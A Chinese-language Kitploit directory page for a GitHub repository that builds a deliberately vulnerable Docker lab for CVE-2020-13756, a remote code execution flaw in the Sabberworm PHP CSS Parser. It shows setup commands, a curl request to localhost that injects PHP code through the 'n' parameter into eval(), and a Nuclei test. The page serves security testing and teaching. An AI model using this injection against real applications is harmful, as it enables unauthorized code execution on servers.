Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/kre80r/cve-2020-13756-env
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubkre80r/cve-2020-13756-env

CVE-2020-13756-env

针对 CVE-2020-13756 (Sabberworm PHP CSS Parser RCE) 的脆弱测试环境

查看仓库
19个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-13756 漏洞环境

针对 CVE-2020-13756 的易受攻击测试环境 - Sabberworm PHP CSS 解析器远程代码执行。

漏洞详情

字段值
CVECVE-2020-13756
产品Sabberworm PHP CSS 解析器
受影响版本< 8.3.1
严重性严重 (CVSS 9.8)
类型远程代码执行

快速启动(一行命令)

root@kitploit:~
docker run -d -p 8080:80 $(docker build -q https://github.com/KrE80r/CVE-2020-13756-env.git)

或者克隆并运行:

root@kitploit:~
git clone https://github.com/KrE80r/CVE-2020-13756-env.git && cd CVE-2020-13756-env && docker-compose up -d

手动设置

root@kitploit:~
# 克隆仓库
git clone https://github.com/KrE80r/CVE-2020-13756-env.git
cd CVE-2020-13756-env

# 构建并运行
docker build -t sabberworm-vuln .
docker run -d -p 8080:80 sabberworm-vuln

验证漏洞

root@kitploit:~
# 测试 RCE - 应在响应中打印 "VULN_TEST"
curl "http://localhost:8080/?n=100;printf(%22VULN_TEST%22);"

预期输出开头包含 VULN_TEST,证明代码执行成功。

使用 Nuclei 测试

root@kitploit:~
nuclei -t CVE-2020-13756.yaml -u http://localhost:8080 -debug

技术细节

漏洞存在于 getSelectorsBySpecificity() 函数中,该函数将未净化的用户输入传递给 eval():

root@kitploit:~
// 漏洞代码路径
$selectors = $doc->getSelectorsBySpecificity('> ' . $_GET['n']);
// 当 n=100;printf("test"); 时,eval() 执行:eval('> 100;printf("test");')

参考

  • NVD
  • 修复提交
  • 完整披露
  • PacketStorm

免责声明

此环境仅供授权的安全测试使用。未经许可不得用于任何系统。

作者

KrE80r - 安全研究

下载工具